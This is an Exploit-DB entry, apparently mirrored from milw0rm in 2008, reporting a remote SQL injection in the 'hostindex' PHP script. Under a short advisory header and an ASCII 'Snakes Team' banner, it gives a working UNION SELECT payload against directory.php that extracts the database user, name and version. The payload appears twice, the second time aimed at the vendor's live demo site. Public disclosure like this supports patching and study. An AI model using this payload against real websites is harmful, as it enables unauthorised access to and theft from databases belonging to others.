Script:hostindex Remote SQL Injection Vulnerability

vendor:

hostindex

by:

Snakespc

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: hostindex

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Script:hostindex Remote SQL Injection Vulnerability

This vulnerability allows an attacker to execute arbitrary SQL commands on the remote database server.

Mitigation:

The vendor should sanitize user input to prevent SQL injection attacks.

Source

Exploit-DB raw data:

==================================================================================================================
=         SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM            = 
=         S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M            =      
+         SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M            +       
=             S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M            =      
=         SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M            = 
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              	                    Script:hostindex  Remote SQL Injection Vulnerability                         +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =   
                =                                                                                    =
                                    :::::Mail: snakespc@gmail.com:::::::             
                =                                                                                    =
                =          = ::::script Demo: http://turnkeyzone.com/demos/hostindex/::::=           =
                =                                                                                    =
                =                          Script site: turnkeyzone.com   "directory.php"            =
                  ===================================Snakespc======================================

Exploit:
http://localhost/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())--
********
demo:
http://turnkeyzone.com/demos/hostindex/directory.php?ax=deadlink&id=-3+UNION SELECT 1,2,concat(user(),0x3a,database(),0x3a,version())--
===================================================================================================================

Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
ALL www.Snakespc.com/SC >>>> Members 
Str0ke ....Milxw0rm
===================================================================================================================

# milw0rm.com [2008-11-23]